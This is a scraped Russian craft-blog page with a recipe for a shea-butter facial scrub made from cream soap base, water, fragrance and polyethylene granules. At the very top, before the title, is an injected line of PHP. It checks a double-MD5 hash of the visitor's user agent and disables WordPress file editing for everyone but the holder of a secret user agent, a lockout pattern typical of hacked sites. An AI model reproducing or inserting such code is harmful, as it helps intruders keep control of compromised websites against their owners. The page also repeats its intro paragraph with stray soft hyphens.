if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Рецепт как сделать скраб с маслом ши своими руками | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Рецепт как сделать скраб с маслом ши своими руками

Мы всегда хотим быть красивой и привлекательной как в своих глазах, так и в глазах окружающих. Немаловажную роль в этом играет состояние кожи, особенно кожи лица. В первую очередь скраб с маслом ши следует применять при уходе за сухой, шелушащейся, увядающей, зрелой и чувствительной кожей лица.

Мы все­гда хотим быть кра­си­вой и при­вле­ка­тель­ной как в сво­их гла­зах, так и в гла­зах окру­жа­ю­щих. Нема­ло­важ­ную роль в этом игра­ет состо­я­ние кожи, осо­бен­но кожи лица. В первую оче­редь скраб с мас­лом ши сле­ду­ет при­ме­нять при ухо­де за сухой, шелу­ша­щей­ся, увя­да­ю­щей, зре­лой и чув­стви­тель­ной кожей лица.

Нам необ­хо­ди­мо иметь:

  • Кре­мо­вую осно­ву под мыло
  • 30 грамм мас­ла ши
  • 30мл. чистой воды
  • 10гр. поли­эти­ле­но­вых гра­нул для скраба
  • Отдуш­ка ваниль и орхидея
  • Пище­вой кра­си­тель – корич­не­вый гелий
  • Мис­ка с лож­кой, баноч­ка с крыш­кой и мик­сер для взбивания

Этап при­го­тов­ле­ния:

  1. В мис­ку поло­жи­те 100гр. мяг­кой осно­вы для крем мыла
    mas_skrab_shi_1
  2. Доба­вить 30гр. мас­ла ши
    mas_skrab_shi_2
  3. Рас­то­пить мяг­кую осно­ву и мас­ло в мик­ро­вол­нов­ке до жид­ких состо­я­ний и доба­вить 4 кап­ли корич­не­во­го пище­во­го рас­тво­ра, 20 капе­лек отдуш­ки и все это взбейте.
    mas_skrab_shi_3
  4. Далее добавь­те 30мл. частя­ми и опять взби­вай­те. Мас­са долж­на быть светлее.
    mas_skrab_shi_4
  5. Нуж­но доба­вить в мыль­ную мас­су грамм 10 поли­эти­ле­но­вых гра­нул для скра­ба, хоро­шо пере­ме­ши­вай­те и поло­жи­те в банку.
    _________________4f86b9692b715

И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: AmouR

Обожаю квиллинг, рукоделие и рисование. Ну и конечно мыловарение! Читайте все мои записи!